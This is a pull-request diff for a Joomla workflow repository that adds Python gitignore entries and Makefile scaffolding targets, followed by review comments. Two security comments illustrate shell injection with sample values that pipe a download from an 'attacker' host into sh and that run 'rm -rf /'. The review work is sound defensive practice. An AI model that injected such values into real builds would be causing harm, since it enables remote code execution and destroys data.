Improve Joomla development workflows and convert scripts to Python #31
30
.gitignore
vendored
30
.gitignore
vendored
@@ -793,6 +793,36 @@ package-lock.json
|
|||||||
.phpunit.result.cache
|
.phpunit.result.cache
|
||||||
codeception.phar
|
codeception.phar
|
||||||
|
|
||||||
|
# Python
|
||||||
|
__pycache__/
|
||||||
|
*.py[cod]
|
||||||
|
*$py.class
|
||||||
|
*.so
|
||||||
|
.Python
|
||||||
|
build/
|
||||||
|
develop-eggs/
|
||||||
|
downloads/
|
||||||
|
eggs/
|
||||||
|
.eggs/
|
||||||
|
lib/
|
||||||
|
lib64/
|
||||||
|
parts/
|
||||||
|
sdist/
|
||||||
|
var/
|
||||||
|
wheels/
|
||||||
|
*.egg-info/
|
||||||
|
.installed.cfg
|
||||||
|
*.egg
|
||||||
|
MANIFEST
|
||||||
|
.pytest_cache/
|
||||||
|
.coverage
|
||||||
|
.coverage.*
|
||||||
|
htmlcov/
|
||||||
|
.tox/
|
||||||
|
.nox/
|
||||||
|
*.cover
|
||||||
|
.hypothesis/
|
||||||
|
|
||||||
# ============================================================
|
# ============================================================
|
||||||
# Keep-empty folders helper
|
# Keep-empty folders helper
|
||||||
# ============================================================
|
# ============================================================
|
||||||
|
|||||||
36
Makefile
36
Makefile
@@ -179,8 +179,42 @@ list-scripts:
|
|||||||
@echo "Available fix scripts:"
|
@echo "Available fix scripts:"
|
||||||
@find scripts/fix -type f -name "*.sh" -exec basename {} \; | sort
|
@find scripts/fix -type f -name "*.sh" -exec basename {} \; | sort
|
||||||
@echo ""
|
@echo ""
|
||||||
@echo "Available run scripts:"
|
@echo "Available run scripts (bash):"
|
||||||
@find scripts/run -type f -name "*.sh" -exec basename {} \; | sort
|
@find scripts/run -type f -name "*.sh" -exec basename {} \; | sort
|
||||||
|
@echo ""
|
||||||
|
@echo "Available run scripts (python):"
|
||||||
|
@find scripts/run -type f -name "*.py" -exec basename {} \; | sort
|
||||||
|
|
||||||
|
## scaffold: Create new Joomla extension scaffolding
|
||||||
|
scaffold:
|
||||||
|
@echo "Create new Joomla extension scaffolding"
|
||||||
|
@echo ""
|
||||||
|
@echo "Usage: make scaffold TYPE=<type> NAME=<name> AUTHOR=<author> DESC=<description>"
|
||||||
|
@echo ""
|
||||||
|
@echo "Types: component, module, plugin, template, package"
|
||||||
|
@echo ""
|
||||||
|
@echo "Example:"
|
||||||
|
@echo " make scaffold TYPE=module NAME='My Module' AUTHOR='John Doe' DESC='Module description'"
|
||||||
|
|
||||||
|
## scaffold-component: Create a component
|
||||||
|
scaffold-component:
|
||||||
|
@python3 scripts/run/scaffold_extension.py component "$(NAME)" "$(DESC)" "$(AUTHOR)"
|
||||||
|
|
||||||
|
## scaffold-module: Create a module
|
||||||
|
scaffold-module:
|
||||||
|
@python3 scripts/run/scaffold_extension.py module "$(NAME)" "$(DESC)" "$(AUTHOR)" --client $(CLIENT)
|
||||||
|
|
||||||
|
## scaffold-plugin: Create a plugin
|
||||||
|
scaffold-plugin:
|
||||||
|
@python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group $(GROUP)
|
||||||
|
|
|||||||
|
|
||||||
|
## scaffold-template: Create a template
|
||||||
|
scaffold-template:
|
||||||
|
@python3 scripts/run/scaffold_extension.py template "$(NAME)" "$(DESC)" "$(AUTHOR)"
|
||||||
|
|
||||||
|
## scaffold-package: Create a package
|
||||||
|
scaffold-package:
|
||||||
|
@python3 scripts/run/scaffold_extension.py package "$(NAME)" "$(DESC)" "$(AUTHOR)"
|
||||||
|
|
||||||
## docs: Open documentation
|
## docs: Open documentation
|
||||||
docs:
|
docs:
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Reference in New Issue
Block a user
The 'scaffold-module' and 'scaffold-plugin' targets reference variables 'CLIENT' and 'GROUP' respectively, but these variables don't have default values. If a user runs these targets without specifying the variables (e.g., 'make scaffold-module NAME="Test"'), the command will pass empty values to the Python script. Consider adding default values (e.g., 'CLIENT ?= site' and 'GROUP ?= system') or documenting that these must be provided.
In the
scaffold-moduletarget, the$(CLIENT)variable is interpolated into the shell command without quoting (--client $(CLIENT)), which allows shell metacharacters inCLIENTto break out of the intended argument and execute arbitrary commands (e.g.CLIENT="site; curl https://attacker/... | sh"). If an attacker can influenceCLIENT(via environment variables ormakearguments in an automated context), runningmake scaffold-moduleresults in remote code execution under the developer's account. TreatCLIENTas untrusted and ensure it is safely passed as data (for example by quoting it and avoiding any expansion that lets the shell interpret its contents as additional arguments or commands).In the
scaffold-plugintarget, the$(GROUP)variable is used unquoted in the shell command (--group $(GROUP)), so a malicious value containing shell metacharacters can inject extra arguments or commands (e.g.GROUP="system; rm -rf /"). IfGROUPis influenced by external input (environment variables, wrapper scripts, or CI parameters), invokingmake scaffold-plugincan lead to arbitrary command execution. TreatGROUPas untrusted input and ensure it is safely handled (for example by quoting it so the shell cannot interpret its contents beyond a single argument).